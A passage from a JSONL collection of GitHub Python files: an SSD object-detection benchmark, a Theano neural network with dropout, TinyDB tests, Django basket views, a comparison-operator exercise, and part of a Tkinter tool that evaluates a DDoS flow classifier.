\"\\n\")\n\n\ndef add_time_info(times):\n # Store execution time information\n times = [round(time, 5) for time in times]\n with open(time_results, \"a\", newline=\"\") as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(times)\n\n\n# Load SSD\nmodel = cv2.dnn.readNet(f\"weights/{MODEL}\", f\"cfg/MobileNetSSD_V2.pbtxt\")\n\n# Check for GPU\nif args.gpu:\n model.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\n model.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n\n\nprint(f\"\\n[Data] {args.data}\\n\")\nprint(f\"\\n[Loading] {MODEL}\")\nprint(f\"[Input dimensions] {INPUT_DIMENSIONS} x {INPUT_DIMENSIONS}\\n\")\n\ncounter = 1\n\n# Total execution time\nstart_time = time.time()\n\n# Run inference on each image\nfor test_image in images_list:\n print(f\"Image: ({counter}/{args.samples}) {test_image}\")\n\n # Execution time information\n frame_start_time = time.time()\n\n # Load image\n img = cv2.imread(images_path + test_image)\n\n # Make result file for this image with the same name\n name = test_image.replace(\".jpg\", \".txt\")\n detection_result_path = os.path.join(detection_results, name)\n open(detection_result_path, \"a\")\n\n height, width, channels = img.shape\n\n # Format image\n blob = cv2.dnn.blobFromImage(\n img, size=(INPUT_DIMENSIONS, INPUT_DIMENSIONS), swapRB=True, crop=False\n )\n\n # Run inference\n model.setInput(blob)\n start_inf = time.time()\n outs = model.forward()\n end_inf = time.time()\n\n # Network output information\n # Based on the code from:\n # https://github.com/opencv/opencv/wiki/TensorFlow-Object-Detection-API\n # (accessed 12/01/20)\n for detection in outs[0, 0, :, :]:\n class_id = int(detection[1])\n confidence = float(detection[2])\n if confidence > args.conf:\n # Object detected\n x1 = detection[3] * width\n y1 = detection[4] * height\n x2 = detection[5] * width\n y2 = detection[6] * height\n\n class_name = str(classes[class_id])\n # remove spaces from class names for mAP score\n class_name = class_name.replace(\" \", \"\", 1)\n line = f\"{class_name} {confidence:.6f} {x1} {y1} {x2} {y2}\"\n add_bb_info(detection_result_path, line)\n\n # Get inference time\n infer_time = end_inf - start_inf\n # print(infer_time)\n\n frame_end_time = time.time() - frame_start_time\n # Write times to file\n add_time_info([frame_end_time, infer_time])\n\n counter += 1\n\n\n# Time taken for code to finish\ntotal_time = time.time() - start_time\nadd_time_info([total_time])\n\nprint(f\"[Time taken] {total_time}\")\n","repo_name":"davet2408/PRJ","sub_path":"ssd_object_detection/test_on_coco.py","file_name":"test_on_coco.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28270198703","text":"\"\"\"\nA deep neural network with or w/o dropout in one file.\n\nLicense: Do What The Fuck You Want to Public License http://www.wtfpl.net/\n\"\"\"\n\nimport numpy, theano, math\nfrom theano import tensor as T\nfrom theano import shared\nfrom theano.tensor.shared_randomstreams import RandomStreams\nfrom collections import OrderedDict\n\nBATCH_SIZE = 100\n\n\ndef relu_f(vec):\n \"\"\" Wrapper to quickly change the rectified linear unit function \"\"\"\n return (vec + abs(vec)) / 2.\n\n\ndef dropout(rng, x, p=0.5):\n \"\"\" Zero-out random values in x with probability p using rng \"\"\"\n if p > 0. and p < 1.:\n seed = rng.randint(2 ** 30)\n srng = theano.tensor.shared_randomstreams.RandomStreams(seed)\n mask = srng.binomial(n=1, p=1.-p, size=x.shape,\n dtype=theano.config.floatX)\n return x * mask\n return x\n\n\ndef fast_dropout(rng, x):\n \"\"\" Multiply activations by N(1,1) \"\"\"\n seed = rng.randint(2 ** 30)\n srng = RandomStreams(seed)\n mask = srng.normal(size=x.shape, avg=1., dtype=theano.config.floatX)\n return x * mask\n\n\ndef build_shared_zeros(shape, name):\n \"\"\" Builds a theano shared variable filled with a zeros numpy array \"\"\"\n return shared(value=numpy.zeros(shape, dtype=theano.config.floatX),\n name=name, borrow=True)\n\n\nclass Linear(object):\n \"\"\" Basic linear transformation layer (W.X + b) \"\"\"\n def __init__(self, rng, input, n_in, n_out, W=None, b=None, fdrop=False):\n if W is None:\n W_values = numpy.asarray(rng.uniform(\n low=-numpy.sqrt(6. / (n_in + n_out)),\n high=numpy.sqrt(6. / (n_in + n_out)),\n size=(n_in, n_out)), dtype=theano.config.floatX)\n W_values *= 4 # This works for sigmoid activated networks!\n W = theano.shared(value=W_values, name='W', borrow=True)\n if b is None:\n b = build_shared_zeros((n_out,), 'b')\n self.input = input\n self.W = W\n self.b = b\n self.params = [self.W, self.b]\n self.output = T.dot(self.input, self.W) + self.b\n if fdrop:\n self.output = fast_dropout(rng, self.output)\n\n def __repr__(self):\n return \"Linear\"\n\n\nclass SigmoidLayer(Linear):\n \"\"\" Sigmoid activation layer (sigmoid(W.X + b)) \"\"\"\n def __init__(self, rng, input, n_in, n_out, W=None, b=None, fdrop=False):\n super(SigmoidLayer, self).__init__(rng, input, n_in, n_out, W, b)\n self.pre_activation = self.output\n if fdrop:\n self.pre_activation = fast_dropout(rng, self.pre_activation)\n self.output = T.nnet.sigmoid(self.pre_activation)\n\n\nclass ReLU(Linear):\n \"\"\" Rectified Linear Unit activation layer (max(0, W.X + b)) \"\"\"\n def __init__(self, rng, input, n_in, n_out, W=None, b=None, fdrop=False):\n if b is None:\n b = build_shared_zeros((n_out,), 'b')\n super(ReLU, self).__init__(rng, input, n_in, n_out, W, b)\n self.pre_activation = self.output\n if fdrop:\n self.pre_activation = fast_dropout(rng, self.pre_activation)\n self.output = relu_f(self.pre_activation)\n\n\nclass DatasetMiniBatchIterator(object):\n \"\"\" Basic mini-batch iterator \"\"\"\n def __init__(self, x, y, batch_size=BATCH_SIZE, randomize=False):\n self.x = x\n self.y = y\n self.batch_size = batch_size\n self.randomize = randomize\n from sklearn.utils import check_random_state\n self.rng = check_random_state(42)\n\n def __iter__(self):\n n_samples = self.x.shape[0]\n if self.randomize:\n for _ in xrange(n_samples / BATCH_SIZE):\n if BATCH_SIZE > 1:\n i = int(self.rng.rand(1) * ((n_samples+BATCH_SIZE-1) / BATCH_SIZE))\n else:\n i = int(math.floor(self.rng.rand(1) * n_samples))\n yield (i, self.x[i*self.batch_size:(i+1)*self.batch_size],\n self.y[i*self.batch_size:(i+1)*self.batch_size])\n else:\n for i in xrange((n_samples + self.batch_size - 1)\n / self.batch_size):\n yield (self.x[i*self.batch_size:(i+1)*self.batch_size],\n self.y[i*self.batch_size:(i+1)*self.batch_size])\n\n\nclass LogisticRegression:\n \"\"\"Multi-class Logistic Regression\n \"\"\"\n def __init__(self, rng, input, n_in, n_out, W=None, b=None):\n if W != None:\n self.W = W\n else:\n self.W = build_shared_zeros((n_in, n_out), 'W')\n if b != None:\n self.b = b\n else:\n self.b = build_shared_zeros((n_out,), 'b')\n\n # P(Y|X) = softmax(W.X + b)\n self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)\n self.y_pred = T.argmax(self.p_y_given_x, axis=1)\n self.output = self.y_pred\n self.params = [self.W, self.b]\n\n def negative_log_likelihood(self, y):\n return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n def negative_log_likelihood_sum(self, y):\n return -T.sum(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n def training_cost(self, y):\n \"\"\" Wrapper for standard name \"\"\"\n return self.negative_log_likelihood_sum(y)\n\n def errors(self, y):\n if y.ndim != self.y_pred.ndim:\n raise TypeError(\"y should have the same shape as self.y_pred\",\n (\"y\", y.type, \"y_pred\", self.y_pred.type))\n if y.dtype.startswith('int'):\n return T.mean(T.neq(self.y_pred, y))\n else:\n print(\"!!! y should be of int type\")\n return T.mean(T.neq(self.y_pred, numpy.asarray(y, dtype='int')))\n\n\nclass NeuralNet(object):\n \"\"\" Neural network (not regularized, without dropout) \"\"\"\n def __init__(self, numpy_rng, theano_rng=None, \n n_ins=40*3,\n layers_types=[Linear, ReLU, ReLU, ReLU, LogisticRegression],\n layers_sizes=[1024, 1024, 1024, 1024],\n n_outs=62 * 3,\n rho=0.9,\n eps=1.E-6,\n max_norm=0.,\n debugprint=False):\n \"\"\"\n Basic feedforward neural network.\n \"\"\"\n self.layers = []\n self.params = []\n self.n_layers = len(layers_types)\n self.layers_types = layers_types\n assert self.n_layers > 0\n self.max_norm = max_norm\n self._rho = rho # \"momentum\" for adadelta\n self._eps = eps # epsilon for adadelta\n self._accugrads = [] # for adadelta\n self._accudeltas = [] # for adadelta\n\n if theano_rng == None:\n theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))\n\n self.x = T.fmatrix('x')\n self.y = T.ivector('y')\n \n self.layers_ins = [n_ins] + layers_sizes\n self.layers_outs = layers_sizes + [n_outs]\n \n layer_input = self.x\n \n for layer_type, n_in, n_out in zip(layers_types,\n self.layers_ins, self.layers_outs):\n this_layer = layer_type(rng=numpy_rng,\n input=layer_input, n_in=n_in, n_out=n_out)\n assert hasattr(this_layer, 'output')\n self.params.extend(this_layer.params)\n self._accugrads.extend([build_shared_zeros(t.shape.eval(),\n 'accugrad') for t in this_layer.params])\n self._accudeltas.extend([build_shared_zeros(t.shape.eval(),\n 'accudelta') for t in this_layer.params])\n\n self.layers.append(this_layer)\n layer_input = this_layer.output\n\n assert hasattr(self.layers[-1], 'training_cost')\n assert hasattr(self.layers[-1], 'errors')\n # TODO standardize cost\n self.mean_cost = self.layers[-1].negative_log_likelihood(self.y)\n self.cost = self.layers[-1].training_cost(self.y)\n if debugprint:\n theano.printing.debugprint(self.cost)\n\n self.errors = self.layers[-1].errors(self.y)\n\n def __repr__(self):\n dimensions_layers_str = map(lambda x: \"x\".join(map(str, x)),\n zip(self.layers_ins, self.layers_outs))\n return \"_\".join(map(lambda x: \"_\".join((x[0].__name__, x[1])),\n zip(self.layers_types, dimensions_layers_str)))\n\n\n def get_SGD_trainer(self):\n \"\"\" Returns a plain SGD minibatch trainer with learning rate as param.\n \"\"\"\n batch_x = T.fmatrix('batch_x')\n batch_y = T.ivector('batch_y')\n learning_rate = T.dscalar('lr') # learning rate to use\n # compute the gradients with respect to the model parameters\n # using mean_cost so that the learning rate is not too dependent\n # on the batch size\n gparams = T.grad(self.mean_cost, self.params)\n\n # compute list of weights updates\n updates = OrderedDict()\n for param, gparam in zip(self.params, gparams):\n if self.max_norm:\n W = param - gparam * learning_rate\n col_norms = W.norm(2, axis=0)\n desired_norms = T.clip(col_norms, 0, self.max_norm)\n updates[param] = W * (desired_norms / (1e-6 + col_norms))\n else:\n updates[param] = param - gparam * learning_rate\n\n train_fn = theano.function(inputs=[theano.Param(batch_x),\n theano.Param(batch_y),\n theano.Param(learning_rate)],\n outputs=self.mean_cost,\n updates=updates,\n givens={self.x: batch_x, self.y: batch_y})\n\n return train_fn\n\n\n def get_adagrad_trainer(self):\n \"\"\" Returns an Adagrad (Duchi et al. 2010) trainer using a learning rate.\n \"\"\"\n batch_x = T.fmatrix('batch_x')\n batch_y = T.ivector('batch_y')\n learning_rate = T.dscalar('lr') # learning rate to use\n # compute the gradients with respect to the model parameters\n gparams = T.grad(self.mean_cost, self.params)\n\n # compute list of weights updates\n updates = OrderedDict()\n for accugrad, param, gparam in zip(self._accugrads, self.params, gparams):\n # c.f. Algorithm 1 in the Adadelta paper (Zeiler 2012)\n agrad = accugrad + gparam * gparam\n dx = - (learning_rate / T.sqrt(agrad + self._eps)) * gparam\n if self.max_norm:\n W = param + dx\n col_norms = W.norm(2, axis=0)\n desired_norms = T.clip(col_norms, 0, self.max_norm)\n updates[param] = W * (desired_norms / (1e-6 + col_norms))\n else:\n updates[param] = param + dx\n updates[accugrad] = agrad\n\n train_fn = theano.function(inputs=[theano.Param(batch_x), \n theano.Param(batch_y),\n theano.Param(learning_rate)],\n outputs=self.mean_cost,\n updates=updates,\n givens={self.x: batch_x, self.y: batch_y})\n\n return train_fn\n\n def get_adadelta_trainer(self):\n \"\"\" Returns an Adadelta (Zeiler 2012) trainer using self._rho and\n self._eps params.\n \"\"\"\n batch_x = T.fmatrix('batch_x')\n batch_y = T.ivector('batch_y')\n # compute the gradients with respect to the model parameters\n gparams = T.grad(self.mean_cost, self.params)\n\n # compute list of weights updates\n updates = OrderedDict()\n for accugrad, accudelta, param, gparam in zip(self._accugrads,\n self._accudeltas, self.params, gparams):\n # c.f. Algorithm 1 in the Adadelta paper (Zeiler 2012)\n agrad = self._rho * accugrad + (1 - self._rho) * gparam * gparam\n dx = - T.sqrt((accudelta + self._eps)\n / (agrad + self._eps)) * gparam\n updates[accudelta] = (self._rho * accudelta\n + (1 - self._rho) * dx * dx)\n if self.max_norm:\n W = param + dx\n col_norms = W.norm(2, axis=0)\n desired_norms = T.clip(col_norms, 0, self.max_norm)\n updates[param] = W * (desired_norms / (1e-6 + col_norms))\n else:\n updates[param] = param + dx\n updates[accugrad] = agrad\n\n train_fn = theano.function(inputs=[theano.Param(batch_x),\n theano.Param(batch_y)],\n outputs=self.mean_cost,\n updates=updates,\n givens={self.x: batch_x, self.y: batch_y})\n\n return train_fn\n\n def score_classif(self, given_set):\n \"\"\" Returns functions to get current classification errors. \"\"\"\n batch_x = T.fmatrix('batch_x')\n batch_y = T.ivector('batch_y')\n score = theano.function(inputs=[theano.Param(batch_x),\n theano.Param(batch_y)],\n outputs=self.errors,\n givens={self.x: batch_x, self.y: batch_y})\n\n def scoref():\n \"\"\" returned function that scans the entire set given as input \"\"\"\n return [score(batch_x, batch_y) for batch_x, batch_y in given_set]\n\n return scoref\n\n\nclass RegularizedNet(NeuralNet):\n \"\"\" Neural net with L1 and L2 regularization \"\"\"\n def __init__(self, numpy_rng, theano_rng=None,\n n_ins=100,\n layers_types=[ReLU, ReLU, ReLU, LogisticRegression],\n layers_sizes=[1024, 1024, 1024],\n n_outs=2,\n rho=0.9,\n eps=1.E-6,\n L1_reg=0.,\n L2_reg=0.,\n max_norm=0.,\n debugprint=False):\n \"\"\"\n Feedforward neural network with added L1 and/or L2 regularization.\n \"\"\"\n super(RegularizedNet, self).__init__(numpy_rng, theano_rng, n_ins,\n layers_types, layers_sizes, n_outs, rho, eps, max_norm,\n debugprint)\n\n L1 = shared(0.)\n for param in self.params:\n L1 += T.sum(abs(param))\n if L1_reg > 0.:\n self.cost = self.cost + L1_reg * L1\n L2 = shared(0.)\n for param in self.params:\n L2 += T.sum(param ** 2)\n if L2_reg > 0.:\n self.cost = self.cost + L2_reg * L2\n\n\nclass DropoutNet(NeuralNet):\n \"\"\" Neural net with dropout (see Hinton's et al. paper) \"\"\"\n def __init__(self, numpy_rng, theano_rng=None,\n n_ins=40*3,\n layers_types=[ReLU, ReLU, ReLU, ReLU, LogisticRegression],\n layers_sizes=[4000, 4000, 4000, 4000],\n dropout_rates=[0.2, 0.5, 0.5, 0.5, 0.5],\n n_outs=62 * 3,\n rho=0.9,\n eps=1.E-6,\n max_norm=0.,\n fast_drop=False,\n debugprint=False):\n \"\"\"\n Feedforward neural network with dropout regularization.\n \"\"\"\n super(DropoutNet, self).__init__(numpy_rng, theano_rng, n_ins,\n layers_types, layers_sizes, n_outs, rho, eps, max_norm,\n debugprint)\n\n self.dropout_rates = dropout_rates\n if fast_drop:\n if dropout_rates[0]:\n dropout_layer_input = fast_dropout(numpy_rng, self.x)\n else:\n dropout_layer_input = self.x\n else:\n dropout_layer_input = dropout(numpy_rng, self.x, p=dropout_rates[0])\n self.dropout_layers = []\n\n for layer, layer_type, n_in, n_out, dr in zip(self.layers,\n layers_types, self.layers_ins, self.layers_outs,\n dropout_rates[1:] + [0]): # !!! we do not dropout anything\n # from the last layer !!!\n if dr:\n if fast_drop:\n this_layer = layer_type(rng=numpy_rng,\n input=dropout_layer_input, n_in=n_in, n_out=n_out,\n W=layer.W, b=layer.b, fdrop=True)\n else:\n this_layer = layer_type(rng=numpy_rng,\n input=dropout_layer_input, n_in=n_in, n_out=n_out,\n W=layer.W * 1. / (1. - dr),\n b=layer.b * 1. / (1. - dr))\n # N.B. dropout with dr==1 does not dropanything!!\n this_layer.output = dropout(numpy_rng, this_layer.output, dr)\n else:\n this_layer = layer_type(rng=numpy_rng,\n input=dropout_layer_input, n_in=n_in, n_out=n_out,\n W=layer.W, b=layer.b)\n\n assert hasattr(this_layer, 'output')\n self.dropout_layers.append(this_layer)\n dropout_layer_input = this_layer.output\n\n assert hasattr(self.layers[-1], 'training_cost')\n assert hasattr(self.layers[-1], 'errors')\n # these are the dropout costs\n self.mean_cost = self.dropout_layers[-1].negative_log_likelihood(self.y)\n self.cost = self.dropout_layers[-1].training_cost(self.y)\n\n # these is the non-dropout errors\n self.errors = self.layers[-1].errors(self.y)\n\n def __repr__(self):\n return super(DropoutNet, self).__repr__() + \"\\n\"\\\n + \"dropout rates: \" + str(self.dropout_rates)\n\n\n","repo_name":"swarbrickjones/NN_SGD","sub_path":"dnn_all.py","file_name":"dnn_all.py","file_ext":"py","file_size_in_byte":17385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10368555530","text":"import os\n\nimport pytest\nfrom tinydb import TinyDB\n\nfrom tiny_thingy import Thingy, q\n\n\n@pytest.fixture\ndef database():\n filename = \"/tmp/tiny-thingy-tests.json\"\n yield TinyDB(filename)\n os.remove(filename)\n\n\n@pytest.fixture\ndef table(request, database):\n return database.table(request.node.name)\n\n\n@pytest.fixture\ndef TestThingy(database, table):\n class TestThingy(Thingy):\n _database = database\n _table = table\n\n return TestThingy\n\n\ndef test_thingy_database(TestThingy, database):\n assert TestThingy.database == database\n\n\ndef test_thingy_table(TestThingy, table):\n assert TestThingy.table == table\n\n\ndef test_thingy_names(database):\n class Foo(Thingy):\n pass\n\n with pytest.raises(AttributeError):\n Foo.database\n\n Foo._database = database\n assert Foo.database == database\n assert Foo.table == database.table(\"foo\")\n assert Foo.table_name == \"foo\"\n\n\ndef test_table_name(table):\n class Foo(Thingy):\n _table = table\n\n assert Foo.table_name == table.name\n\n\ndef test_use_database():\n class Foo(Thingy):\n pass\n\n filename = \"/tmp/test-tiny-thingy-use-database.json\"\n Foo.use_database(filename)\n assert Foo.database is not None\n os.remove(filename)\n\n\ndef test_create(TestThingy, table):\n documents = [{\"Test\": 42}, {\"foo\": \"bar\"}, {\"baz\": \"fool\"}]\n for document in documents:\n TestThingy.create(document)\n assert table.all() == documents\n\n\ndef test_find(TestThingy, table):\n documents = [{\"id\": 42}, {\"id\": 32}, {\"id\": 13}]\n for document in documents:\n table.insert(document)\n assert len(TestThingy.find()) == 3\n assert len(TestThingy.find(q.id > 20)) == 2\n\n\ndef test_save(TestThingy, table):\n thingy = TestThingy(test=42)\n thingy.save()\n assert len(table) == 1\n thingy2 = TestThingy.find()[0]\n assert thingy2.doc_id == thingy.doc_id\n thingy.test = 101\n thingy.save()\n thingy2 = TestThingy.find()[0]\n assert thingy2.test == thingy.test\n\n\ndef test_find_one(TestThingy, table):\n assert TestThingy.find_one() is None\n TestThingy(test=42, foo=\"bar\").save()\n thingy = TestThingy.find_one()\n assert isinstance(thingy, TestThingy)\n assert thingy.test == 42\n\n\ndef test_find_one_doc_id(TestThingy):\n assert TestThingy.find_one() is None\n TestThingy().save()\n thingy = TestThingy(lol=42, foo=\"bar\").save()\n thingy = TestThingy.find_one(doc_id=thingy.doc_id)\n assert isinstance(thingy, TestThingy)\n assert thingy.lol == 42\n thingy2 = TestThingy.find_one(q.lol == 69, doc_id=thingy.doc_id)\n assert thingy2 is None\n\n\ndef test_count(TestThingy, table):\n documents = [{\"id\": 42}, {\"id\": 32}, {\"id\": 13}]\n for document in documents:\n table.insert(document)\n assert TestThingy.count() == 3\n\n\ndef test_remove(TestThingy, table):\n TestThingy(foo=\"bar\").save()\n assert len(table) == 1\n TestThingy.remove(q.foo == \"bar\")\n assert len(table) == 0\n\n\ndef test_inplace_update(TestThingy, table):\n TestThingy(foo=\"bar\").save()\n assert len(table) == 1\n TestThingy.inplace_update({\"foo\": \"baz\"})\n assert len(table) == 1\n assert TestThingy.find_one().foo == \"baz\"\n\n\ndef test_delete(TestThingy, table):\n thingy = TestThingy(foo=\"bar\").save()\n assert len(table) == 1\n thingy.delete()\n assert len(table) == 0\n","repo_name":"Shir0kamii/tiny-thingy","sub_path":"test_tiny_thingy.py","file_name":"test_tiny_thingy.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"32619772684","text":"from django.http import Http404\nfrom django.shortcuts import render, HttpResponseRedirect, get_object_or_404\nfrom basketapp.models import Basket\nfrom mainapp.models import Product\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.template.loader import render_to_string\nfrom django.http import JsonResponse\nimport json\n\n\ndef basket(request):\n title = 'Your basket'\n\n basket_items = Basket.objects.filter(user=request.user).order_by('product__category')\n\n content = {\n 'title': title,\n 'basket_items': basket_items,\n }\n return render(request, 'basket.html', content)\n\n@login_required\ndef basket_add(request, pk):\n product = get_object_or_404(Product, pk=pk)\n old_basket_item = Basket.objects.filter(user=request.user, product=product)\n\n if old_basket_item:\n old_basket_item[0].quantity += 1\n old_basket_item[0].save()\n else:\n new_basket_item = Basket(user=request.user, product=product)\n new_basket_item.quantity += 1\n new_basket_item.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef basket_remove(request, pk):\n if request.method == 'POST':\n basket_record = get_object_or_404(Basket, pk=pk)\n basket_record.delete()\n print(\"request.META.get('HTTP_REFERER')\", request.META.get('HTTP_REFERER'))\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n else:\n raise Http404\n\n@login_required\ndef basket_edit(request, pk, quantity):\n if request.is_ajax():\n quantity = int(quantity)\n new_basket_item = Basket.objects.get(pk=int(pk))\n\n if quantity > 0:\n new_basket_item.quantity = quantity\n new_basket_item.save()\n else:\n new_basket_item.delete()\n\n basket_items = Basket.objects.filter(user=request.user).order_by('product__category')\n\n content = {\n 'basket_items': basket_items,\n }\n\n result = render_to_string('inc/record_include.html', content)\n #Сериализация моделей джанго в json\n return JsonResponse({'result': result}) #json.dump(basket.items)})\n else:\n return Http404\n\ndef basket_ajaxdelete(request, pk):\n if request.is_ajax():\n new_basket_item = Basket.objects.get(pk=int(pk))\n new_basket_item.delete()\n\n basket_items = Basket.objects.filter(user=request.user).order_by('product__category')\n\n content = {\n 'basket_items': basket_items,\n }\n\n result = render_to_string('inc/record_include.html', content)\n\n return JsonResponse({'result': result})\n else:\n return Http404","repo_name":"towardsbackwards/Django-store","sub_path":"basketapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30843770198","text":"# C언어의 비교 연산자는 아래 표에 나와있다. \n\n# 연산자\t뜻\n# >\t크다\n# >=\t크거나 같다\n# <\t작다\n# <=\t작거나 같다\n# ==\t같다\n# !=\t같지 않다\n# 이 연산자는 두 피연산자를 비교하고, (왼쪽 값과 오른쪽 값) true또는 false (1 또는 0)을 리턴한다. 예를 들어, 2 > 3은 \"false\"를 리턴하고 (2는 3보다 작기 때문), 3 != 4는 \"true\", 3 >= 3은 \"true\"를 리턴한다.\n\n# C언어의 비교 연산식이 주어졌을 때, 결과를 구하는 프로그램을 작성하시오.\n\nimport sys\nn = 1\nwhile True:\n s = sys.stdin.readline().split()\n res = ''\n if s[1] == 'E':\n break\n if s[1] == '>=':\n if int(s[0]) >= int(s[2]):\n res += 'true'\n else:\n res += 'false'\n elif s[1] == '>':\n if int(s[0]) > int(s[2]):\n res += 'true'\n else:\n res += 'false'\n if s[1] == '<=':\n if int(s[0]) <= int(s[2]):\n res += 'true'\n else:\n res += 'false'\n elif s[1] == '<':\n if int(s[0]) < int(s[2]):\n res += 'true'\n else:\n res += 'false'\n if s[1] == '==':\n if int(s[0]) == int(s[2]):\n res += 'true'\n else:\n res += 'false'\n if s[1] == '!=':\n if int(s[0]) != int(s[2]):\n res += 'true'\n else:\n res += 'false'\n \n print('Case '+str(n)+': '+res)\n n+=1","repo_name":"kysuk05/BJO_algo","sub_path":"브론즈/BJO5656.py","file_name":"BJO5656.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16399193897","text":"\nimport pandas as pd\nimport numpy as np\n\nimport pickle\nimport csv\nimport tkinter as tk\n\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox, ttk\nimport threading\nimport time\n\n\n\n\n\ndef startevaluating(attackerIP, inputfile, outputfile):\n print(attackerIP)\n\n # load the model from disk\n path = inputfile\n #the output path file has been set to be the folder from where the input file has been received\n offlinefilepath = outputfile\n #attackerIP = \"192.168.18.82\"\n\n loaded_model = pickle.load(open(r'D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models\\LogisticRegression_Model1.sav', 'rb'))\n #data recieved from cicflowmeter is this file\n #path = r\"D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models\\2020-03-15_Flow.csv\"\n #path = r\"F:\\Adam\\CICflowmeter Current\\CICFlowMeter-master\\data\\daily\\2020-08-31_Flow.csv\"\n\n offlinefilepath = r'D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models\\outputfile.csv'\n\n totalflows = 1\n totalp = 1\n tp = 1\n fp = 1\n totaln = 1\n tn = 1\n fn = 1\n\n x = 0\n y = 1\n\n startscanafteriprecievedbtn[\"state\"] = \"disabled\"\n quitevaluatebtn[\"state\"] = \"normal\"\n\n while(True):\n if numberx == 1:\n setnumber(0)\n print(\"Break while\")\n break\n\n try:\n\n dataset = pd.read_csv(path, skiprows=x)\n complete_dataset = pd.read_csv(path, skiprows=x)\n\n x = x + len(dataset)\n\n\n except:\n\n print(\"File not found or bieng accessed or some error \"\n \"with original file created by cicflowmeter\")\n exit()\n\n #we have the data for analysis, now we have to analyse\n #THIS ALL IS IN WHILE LOOP\n\n #if loop if the dataset is not empty\n if len(dataset) != 0:\n\n dataset.drop(dataset.iloc[:, [0, 1, 2, 3, 5, 6, 83]], axis=1, inplace=True)\n complete_dataset.drop(complete_dataset.iloc[:, [83]], axis=1, inplace=True)\n\n #we have the data for analysis\n for i in range(len(dataset)):\n if numberx == 1:\n print(\"break for\")\n break\n Xrow = dataset.iloc[[i], :].values\n try:\n Y_predict = loaded_model.predict(Xrow)\n except:\n print(\"entered continue\")\n continue\n compXrow = complete_dataset.iloc[[i], :].values\n #for printing out number of rows\n #print(y)\n y = y + 1\n\n # if Y_predict == 1:\n # print(\"ALERTT!!!\")\n\n totalflows = y\n\n\n if compXrow[0, 1] == attackerIP:\n\n # count for ddos flow\n totalp = totalp + 1\n print(totalp)\n #if dataset.iloc[:, 83].values[i] == 1:\n if Y_predict == 1:\n # count for flows that are ddos and predicted 1 (right)\n tp = tp + 1\n else:\n fn = fn + 1\n\n # for normal flows\n elif compXrow[0, 1] != attackerIP:\n # count for normal flow\n totaln = totaln + 1\n if Y_predict == 0:\n # count for flows that are ddos and predicted 0 (right)\n tn = tn + 1\n else:\n fp = fp + 1\n\n Posprecision = tp / (tp + fp)\n Negprecision = tn / (tn + fn)\n\n precall = tp / (tp + fn)\n nrecall = tn / (tn + fp)\n\n Accuracy = (tp + tn) / totalflows\n Accuracyddos = tp / totalp\n Accuracynormal = tn / totaln\n\n\n\n #tv1.delete(*tv1.get_children())\n\n tv1.set(0, 'one', value=(y))\n\n tv1.set(1, 'one', value=(totalp - 1))\n tv1.set(2, 'one', value=(totaln - 1))\n\n tv1.set(3, 'one', value=(tp - 1))\n tv1.set(4, 'one', value=(tn - 1))\n tv1.set(5, 'one', value=(fp - 1))\n tv1.set(6, 'one', value=(fn - 1))\n\n tv1.set(7, 'one', value=(round(Accuracy, 2)))\n tv1.set(8, 'one', value=(round(Accuracyddos, 2)))\n tv1.set(9, 'one', value=(round(Accuracynormal, 2)))\n\n tv1.set(10, 'one', value=(round(Posprecision, 2)))\n tv1.set(11, 'one', value=(round(Negprecision, 2)))\n\n tv1.set(12, 'one', value=(round(precall, 2)))\n tv1.set(13, 'one', value=(round(nrecall, 2)))\n\n\n # enterrow(round(Accuracy, 2))\n # enterrow(round(Accuracyddos, 2))\n # enterrow(round(Accuracynormal, 2))\n #\n # enterrow(round(Posprecision, 2))\n # enterrow(round(Negprecision, 2))\n #\n # enterrow(round(precall, 2))\n # enterrow(round(nrecall, 2))\n\n #for passing complete row content to csv writer rather than the dataset where the columns 1,2,3,4 etc have been removed\n\n Xrow_without_Y = complete_dataset.iloc[[i], :].values\n Flattened_X = Xrow_without_Y.flatten()\n\n complete_Xrow_with_Y = np.append(Flattened_X, Y_predict)\n\n #Writing a CSV file for offline Analysis\n with open(offlinefilepath, 'a', newline='') as offlinefile:\n writer = csv.writer(offlinefile)\n writer.writerow(complete_Xrow_with_Y)\n\n\n # else:\n # print(\"dataset empty, sleeping for 3 seconds\")\n # time.sleep(3)\n #when while ends\n print(\"While ended\")\n windowevaluate.destroy()\n\n\n\n\n\ndef setnumber(number):\n global numberx\n numberx = number\n\nnumberx = 0\ndef setbreakevaluatecode(number):\n global numberx\n numberx = number\n\ndef quitandopenhomewindow():\n print(\"Evaluate ended\")\n setbreakevaluatecode(1)\n\n\ndef createwindowevaluationthread(inputfile, outputfile):\n\n threadwindowevaluation = threading.Thread(target=lambda: createwindowevaluation(inputfile, outputfile))\n threadwindowevaluation.start()\n\ndef gotostartevaluatingthread(attackerIP, inputfile, outputfile):\n setnumber(0)\n threadstartevaluate = threading.Thread(target=lambda: startevaluating(attackerIP, inputfile, outputfile))\n threadstartevaluate.start()\n\ndef enterrow(data):\n tv1.insert(\"\", \"end\", values=data)\n windowevaluate.update()\n\ndef createwindowevaluation(inputfile, 